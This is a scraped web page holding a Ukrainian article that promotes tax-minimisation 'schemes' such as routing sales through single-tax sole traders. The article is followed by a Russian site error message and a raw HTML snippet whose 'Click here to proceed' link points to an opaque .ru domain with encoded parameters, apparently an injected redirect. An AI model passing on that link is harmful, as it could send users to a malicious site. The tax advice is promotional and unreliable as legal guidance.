Статьи

Легальні способи знизити податкове навантаження

З точки зору бізнесу податки – це лише додаткова стаття видатків, яку можливо і потрібно знижувати. Незважаючи на те, що податкове законодавство стає дедалі жорсткіше, але все ж таки воно дозволяє оптимізувати податкові виплати до бюджету. Для цього потрібно правильно організувати бізнес та  чітко спланувати податкове навантаження.

Що дає  нам  правильно спланована система оподаткування на підприємстві?

  • Економія коштів
  • Гнучкість управління підприємством 
  • Привабливість компанії для  інвесторів 

Легальна схема мінімізації податків захищає від проблем з боку контролюючих органів.

Першим кроком до оптимізації оподаткування є фінансовий прогноз компанії. Такий прогноз має враховувати  цілі та способи досягнення їх.
На цьому етапі потрібно прорахувати податкове навантаження. Особливу увагу слід приділити самим « тяжким» податкам таким як: податок на прибуток, податок на додану вартість та зарплатні податки. Далі виходячи  з отриманого бюджету по податкам можна вже застосовувати той чи інший спосіб податкового планування, як приклад це може бути реорганізація підприємства.

Такий спосіб оптимізації податків, як податкові пільги потребує від компанії значних  обмежень. враховуючи всі обмеження вести подібний бізнес в Україні майже неможливо  вести, тому й використовують спеціальні схеми податкової оптимізації.

Суть даних схем полягає в наступному

У кожної групи платників податку є свої слабкі  та сильні сторони . Наприклад,  єдинник  платить певну суму податку на місяць , але в той же час має обмеження по річному  обігу та кількості співробітників. 
Якщо правильним чином включити  його до ланцюга у схемі оптимізації оподаткування , наприклад у ланцюг продажу – це дозволить значною мірою знизити податкове навантаження.

Ще одним способом  мінімізації податків у законний  спосіб є зниження доходів та збільшення видатків підприємства. Однак досить часто про цей спосіб забувають.

Приклад 

Якщо компанія виділить транспортування, зберігання , пакування  та інші сервіси  зі своєї організаційної структури та буде купувати їх у інших підприємців , то таким чином вона збільшить свої витрати, що в свою чергу призведе до зниження податку на прибуток.
Але слід пам’ятати що при зниженні податків слід дотримуватись не лише принципу  економії коштів, але й законності застосованих схем оптимізації податків.

За допомогою нашого сайту ТаксОПтима Ви можете провести оптимізацію на Вашому підприємстві  в законний спосіб.

comments powered by HyperComments
Легальні способи знизити податкове навантаження | Оптимизация налогообложения

Ошибка

На сайте произошла непредвиденная ошибка. Пожалуйста, повторите попытку позже.
<body bgcolor="#ffffff" text="#000000"> <a href="http://ikmfyeurnamdjs.ru/rg-erdr.php?_rpo=t nhFexEw&_rdm=WUVQqf3NB1V4=9.N3&p=5f95%7C%40%7C5f95%7C%40%7CWUVQqf3NB1V4%3D9.N3%7C%40%7CfB%7C%40%7C%7C%40%7CZzAZAzFHF%7C%40%7Czbb%7C%40%7C39%7C%40%7C19c4NW4cGtAtAtzEGAATHbGG%7C%40%7Ct+nAGL7EI%7C%40%7CT+7hEEpub&ga=GL%2FFvpxOBqLU5naIImUdoXvwGIe6Wi5WL285l45NvCrC5WP2XSITKLb0LpG1nd0DLhAyh65XA4cDOBod13%2B2yB77vpxuqL0bKT6Wi0OT4K9NHvqqCJTnVinTePCNUj6Ft4bQyVW34txmpI73nNkABUxVD%2FtD9hPcw7HdOGIbRDU%3D&t=nfrm">Click here to proceed</a>. </body>